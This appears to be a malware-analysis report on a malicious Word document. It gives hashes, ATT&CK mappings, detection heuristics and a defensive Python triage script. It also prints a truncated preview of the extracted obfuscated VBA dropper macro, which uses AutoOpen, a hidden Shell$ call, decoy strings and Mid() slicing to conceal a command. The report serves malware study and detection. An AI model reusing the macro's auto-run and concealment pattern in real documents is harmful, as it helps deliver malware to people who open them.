Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e706b3a32f4c177f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 173.0 KB
Created: 2017-12-14 12:11:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: eaef4b19068aee4c6b1b17d96ddffc44
SHA-1: 8fb66dde86a0dd52343a720e1f8209cf6de98c53
SHA-256: e706b3a32f4c177f1a3536dbd480c639666381b8a68b59821488116c51374eee
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The critical OLE_VBA_SHELL heuristic fires on the statement `VBA.Shell$ NWIwSpjw, 0` in the extracted macro: Shell() launches an external process, and the window-style argument 0 (vbHide) runs it without a visible window. An AutoOpen procedure is present, so the call runs as soon as the document is opened with macros enabled. Note what the argument is: NWIwSpjw is not one of the variables built by string concatenation in AutoOpen but a separate Function whose return value becomes the command line. The concatenated strings in AutoOpen are assigned and never read, i.e. decoy code, and the function body is padded with lines that only sum IsNull() calls on string literals, which always evaluate to 0. The content that matters is carried by Mid() calls that cut a fixed window out of a longer string wrapped in junk characters; fragments such as `.exe`, `;` and `foreach` are visible in those source strings. The slices still contain repeated filler tokens (qKn, tfw+tfw) and the preview is truncated before the function returns, so the final command cannot be reconstructed from this extract alone. The ClamAV signature name 'Img.Dropper.PhishingLure-6443153-0' classifies the file as a phishing-lure dropper; the label says nothing further about the payload.

Heuristics (7)

  • CLAMAV_DETECTION (critical): ClamAV: Img.Dropper.PhishingLure-6443153-0
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • OLE_VBA_MACROS (medium, 3 related findings): VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL (critical): Shell() call in VBA
    The macro source contains a Shell() call (here `VBA.Shell$ NWIwSpjw, 0`), which launches an external process from the document.
  • OLE_VBA_AUTOOPEN (high): AutoOpen macro
    An AutoOpen procedure is defined, so the macro code runs when the document is opened with macros enabled.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (see macros.bas under Extracted artifacts), so the "no modern VBA project" wording is the heuristic's generic description; the OLE_VBA_SHELL and OLE_VBA_AUTOOPEN findings are the primary evidence here.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier that Office itself writes into documents; it is not an attacker-controlled address and is not a network indicator for this sample.
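The following Python reproduces, on the macro text shown in this report, what the summary above and the OLE_VBA_AUTOOPEN / OLE_VBA_SHELL heuristics look for, and then separates the decoy concatenations and IsNull() padding from the Mid() slices that carry the concealed fragments. It is an added example for this page, not code from the report's pipeline or from oletools; SAMPLE_VBA is a trimmed copy of the macro preview on this page, and the function names (find_autoexec, find_shell_calls, decoy_assignments, recover_mid_slices, triage) and the AUTOEXEC_NAMES set are the example's own choices.

```python
"""Triage helpers for decoded VBA source such as the macros.bas artifact on this page.

Added example; not code from the report's pipeline or from oletools.
"""
import re

# Constructed input: a trimmed copy of the macro preview on this page
# (decoy and padding lines reduced to a few representatives).
SAMPLE_VBA = r"""Attribute VB_Name = "oahmhvzwz"
Sub AutoOpen()
faWMndOTVtisw = "LQfFtnzwmkS" + "wXTPjhRYjYI" + "bOVrzJkBcd" + "ASrIBsjnm"
VBA.Shell$ NWIwSpjw, 0
tVBDTAJY = "uoqEPrHVIz" + "DJOYpSNRlwR" + "cIlrCsdidbDcb"
End Sub
Function NWIwSpjw()
BGUXuc = IsNull("wIHAjlOTX") + IsNull("siWCZHFQcilLYk") + IsNull("rrDAwDimn")
JZQClHKSOc = Mid("4HMu7wAH8j4qKsTKYGrdesqKn+'+'qKtfw+tfwnigqKn+qKnnqKn+qKn.cotf'+'w+tfwmqKn+qKtfw+tfwn/qKn+qKn0mqKn+qKnRP/ycWqKn+qKn.qKn+qKnSpqKn+qKnliqKn'+'+qKntfw+tfwBtcqsGz", 19, 132)
KvljjDIz = IsNull("HWKkuWV") + IsNull("hFjdTdU") + IsNull("QjAUzdzbQRaq")
hSAzzDZrqfF = Mid("48aaCqdi0CqqjjBwKn+qKtfw+tfw'+'nSLkqKn'+'+qKnarapatfw+tf'+'ws +qKn+qKtfw+tfwn ycWqKn+qKn.exeycW;qKn+qKnforeachqKn+qndYzjm", 16, 100)
wjpsVnCwGJ = Mid("WdvumpZYUhKn+tfw+tfwqKnvqKn+qKnoktfw+tfwetfw+tfw-qKn+qKnIqKn+tfw+tfwqKntem(0SLhuqKn+qKnaqKn'+'+qKnsqKtfw+tfwn+qKn);brqKn+YzY", 11, 111)
End Function
"""

# Procedure names Word/Excel run automatically (well-known subset, chosen here).
AUTOEXEC_NAMES = {"AutoOpen", "AutoExec", "AutoClose", "AutoExit", "AutoNew",
                  "Document_Open", "Document_Close", "Workbook_Open", "Auto_Open"}

# Second argument of Shell(): the VBA window-style constants.
WINDOW_STYLE = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}

SUB_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)\s*\(", re.M)
# Matches both the statement form `Shell$ cmd, 0` and the call form `Shell(cmd, 0)`.
SHELL_RE = re.compile(r"\b(?:VBA\.)?Shell\$?\s*\(?\s*([^,()\n]+?)\s*,\s*(\d+)\s*\)?")
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.M)
LITERAL_CONCAT_RE = re.compile(r'^"[^"]*"(?:\s*\+\s*"[^"]*")*$')
ISNULL_PAD_RE = re.compile(r'^IsNull\("[^"]*"\)(?:\s*\+\s*IsNull\("[^"]*"\))*$')
MID_RE = re.compile(r'^\s*(\w+)\s*=\s*Mid\("((?:[^"]|"")*)",\s*(\d+),\s*(\d+)\)', re.M)


def find_autoexec(src):
    """Names of auto-executing procedures defined in the source."""
    return [m.group(1) for m in SUB_RE.finditer(src) if m.group(1) in AUTOEXEC_NAMES]


def find_shell_calls(src):
    """(command expression, window style, constant name) for every Shell() sink."""
    return [(m.group(1), int(m.group(2)), WINDOW_STYLE.get(int(m.group(2)), "unknown"))
            for m in SHELL_RE.finditer(src)]


def _mentions(name, src):
    """Whole-word occurrences of an identifier; 1 means it is only ever assigned."""
    return len(re.findall(r"\b%s\b" % re.escape(name), src))


def decoy_assignments(src):
    """Variables built purely from string literals and never read anywhere."""
    return [m.group(1) for m in ASSIGN_RE.finditer(src)
            if LITERAL_CONCAT_RE.match(m.group(2)) and _mentions(m.group(1), src) == 1]


def padding_lines(src):
    """Assignments whose RHS only sums IsNull(<literal>) terms; each is always 0."""
    return [m.group(1) for m in ASSIGN_RE.finditer(src) if ISNULL_PAD_RE.match(m.group(2))]


def vba_mid(s, start, length):
    """Emulate VBA Mid(): 1-based start, result clipped at the end of the string."""
    if start < 1 or length < 0:
        raise ValueError("VBA raises 'Invalid procedure call or argument' here")
    return s[start - 1:start - 1 + length]


def recover_mid_slices(src):
    """(variable, slice) for each Mid() on a literal: the junk prefix and suffix
    are dropped and only the window the macro actually uses is kept."""
    return [(m.group(1), vba_mid(m.group(2).replace('""', '"'), int(m.group(3)), int(m.group(4))))
            for m in MID_RE.finditer(src)]


def triage(src):
    """Summary in the shape of the report's macro heuristics."""
    return {
        "autoexec": find_autoexec(src),
        "shell_calls": find_shell_calls(src),
        "decoy_assignments": decoy_assignments(src),
        "padding_lines": len(padding_lines(src)),
        "mid_slices": recover_mid_slices(src),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
```

On the sample above this reports AutoOpen as the entry point, one Shell() sink whose command is the return value of NWIwSpjw with window style vbHide, the two concatenated strings as decoys, and three Mid() slices of 132, 100 and 111 characters with their junk borders removed. The slices still carry the repeated filler tokens, so the next step in a real analysis is the part of the function the preview cuts off, not anything this script can supply.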

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   73517 bytes
SHA-256: 0a2287173c2b42bb56570a580d02a40b5066bf5097471e9f9502b45f039b6872

Preview: first 1,000 lines of the extracted script (the copy below is truncated)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "oahmhvzwz"
Sub AutoOpen()
faWMndOTVtisw = "LQfFtnzwmkS" + "wXTPjhRYjYI" + "bOVrzJkBcd" + "ASrIBsjnm" + "KfqAGKAbazmHJi" + "SFAczRAUHTw" + "YQfzlWaQiirrz" + "ZCfdsIMdimfL" + "dKKijJScLuzA" + "jNwnOJcQrwod" + "oivhtTZjzGY" + "KhhHOHicGZwhuY"
iWlLWEFUnh = "BdbBlHYrDcv" + "dqGAUPjN" + "VwrNMuCrFMta" + "GEBEnrJCUtnN" + "VPElFHTr" + "fjoZMWAwPBi" + "kCwPboEjAEEAD" + "mnTHmHsZYS" + "OfmCWilfO" + "NFWiTOIjbfnV" + "jNiHPbBKijwM" + "ShdZSVoo"
hzcTsktwmc = "sDosWWDNaiYXS" + "waCCMSjw" + "fhfwiQQh" + "VTQOtlCwRbOqJZ" + "IwJqtZKM" + "sIKrZVzJBiBwuh" + "RzQBFkTWHUnl" + "ZnTLGVWk" + "KWviEpiXLOP" + "ZuJJHKYlCWm" + "pjNKqsYLzrpt" + "bfirkJY"
fAtKCwLzwX = "kMoUcUjSqDiiE" + "DjiutSNNM" + "jTAouNOw" + "BItnKCXDqi" + "ASotwSjCF" + "aWzdlIT" + "YdpjODIKtTrVP" + "ftKQiGpcjL" + "ObluJZtEKREdT" + "lloYMLj" + "CrFSViMDwwinA" + "WQjuwREFaPq"
VBA.Shell$ NWIwSpjw, 0
tVBDTAJY = "uoqEPrHVIz" + "DJOYpSNRlwR" + "cIlrCsdidbDcb" + "qiawjSPKJkGcO" + "msnbcwO" + "iAFdfVCcFmwzbi" + "oMzaRzBkZibrl" + "bzdduEZrGntIj" + "TfRaIBzOdXz" + "cPjwDiQodnTTja" + "zGMjJSWQt" + "BikoNVFjw"
JLHjPrsBjMz = "ijBIRrniGzmlCv" + "zQRNmiwHmwc" + "RZVjhPHAB" + "EEOsTVKYWjTL" + "kPzKKjbPKoZWE" + "PFVvvfMMMwuO" + "zNbwwGhkUiE" + "QZXtPoWPjuTAkX" + "fYCAQwGiCir" + "QWBvXQwfFpS" + "JXztCuaMaaBLRh" + "AJvVLXNFsizwk"
saqGFqszMbII = "BqVpipcwVKU" + "ZwSGKCzq" + "izKEMrvDzTN" + "rLPXtVG" + "mXPWzfta" + "BYKRFTqKlSwhv" + "rGDilCjRhq" + "nLkoEjzUMvuC" + "msZMIDIarzYP" + "zIYGjrTiSIFWjl" + "MjczDSv" + "dXJihIwLMYJjp"
End Sub
Function NWIwSpjw()
BGUXuc = IsNull("wIHAjlOTX") + IsNull("siWCZHFQcilLYk") + IsNull("rrDAwDimn") + IsNull("NbTtLQawUqSU") + IsNull("zimVwYhkjWlrtL") + IsNull("atOwiVLfm") + IsNull("RRLMEuzWwD")
KvljjDIz = IsNull("HWKkuWV") + IsNull("hFjdTdU") + IsNull("QjAUzdzbQRaq") + IsNull("Lnzccfvr") + IsNull("tZNihqTQip") + IsNull("qoqFtGdWjTc") + IsNull("ftWSiAqzYqrmbH")
JZQClHKSOc = Mid("4HMu7wAH8j4qKsTKYGrdesqKn+'+'qKtfw+tfwnigqKn+qKnnqKn+qKn.cotf'+'w+tfwmqKn+qKtfw+tfwn/qKn+qKn0mqKn+qKnRP/ycWqKn+qKn.qKn+qKnSpqKn+qKnliqKn'+'+qKntfw+tfwBtcqsGz", 19, 132)
XUGzGoYp = IsNull("KhfNGwdFi") + IsNull("RFGYabV") + IsNull("ZnCzwjHVYfcn") + IsNull("zHBQMiicZi") + IsNull("EVALEodTbkW") + IsNull("PKjzGkXzc") + IsNull("jTwFHOsnKAFbvd")
WWfpB = IsNull("dHYpLcSUd") + IsNull("jIkJkpa") + IsNull("JOttvjhwJt") + IsNull("bmYJSvCf") + IsNull("mPEvnVifuTJzf") + IsNull("VPXjMoIM") + IsNull("YIBPLzSNh")
fpmBARW = IsNull("vQkCJMkarlG") + IsNull("jcrBkwJpjNz") + IsNull("PaoaWKoOGTLT") + IsNull("vThvtHUBlJKSw") + IsNull("dlnzhRDnjY") + IsNull("DjzrWQRX") + IsNull("oicunGffd")
hSAzzDZrqfF = Mid("48aaCqdi0CqqjjBwKn+qKtfw+tfw'+'nSLkqKn'+'+qKnarapatfw+tf'+'ws +qKn+qKtfw+tfwn ycWqKn+qKn.exeycW;qKn+qKnforeachqKn+qndYzjm", 16, 100)
BFCrwPZK = IsNull("jkuKzFZF") + IsNull("EqkOwiC") + IsNull("uMqqjZwfnmGSjb") + IsNull("bnvYaEZ") + IsNull("mjGIcotFkIF") + IsNull("BrTzKwiJTT") + IsNull("UclIaAGcpUiD")
vbFkJNi = IsNull("AljAzuEB") + IsNull("GAcpKHwhWvc") + IsNull("fYBcEBOpwiTDNc") + IsNull("wLDqrGs") + IsNull("zJKNNWKkN") + IsNull("OUNfXttqMhc") + IsNull("ZchCBWSElrmK")
zbPCQwh = IsNull("cRUqthVK") + IsNull("EEkUvNcaQKT") + IsNull("lfrfTEijPCSoMX") + IsNull("inQmwctYhYGEs") + IsNull("PEYjKqmdKacqdL") + IsNull("lvIYUwm") + IsNull("XVUsHJH")
wjpsVnCwGJ = Mid("WdvumpZYUhKn+tfw+tfwqKnvqKn+qKnoktfw+tfwetfw+tfw-qKn+qKnIqKn+tfw+tfwqKntem(0SLhuqKn+qKnaqKn'+'+qKnsqKtfw+tfwn+qKn);brqKn+YzY", 11, 111)
wsvjClFItj = IsNull("TunASnu") + IsNull("ZzHrQnK") + IsNull("BuLlQkifLVoSIs") + IsNull("hCcEzFptuh") + IsNull("zcaKkiIHkzb") + IsNull("niMHpzwbwj") + IsNull("aoojLsLAQDo")
iJjPSRL = IsNull("mYUNspXqjBwKYm") + IsNull("HpcaCIp") + IsNull("wzVTJXXJaTrUo") + IsNull("UiFlzrfzB") + IsNull("QidETFJo") + IsNull("jWOXWNTIsWrhSR") + IsNull("UuURJzMzzLDbu")
aZCdobN = IsNull("FFAkGJBIYFdp") + IsNull("nzAwvFfTAz") + 
... (truncated)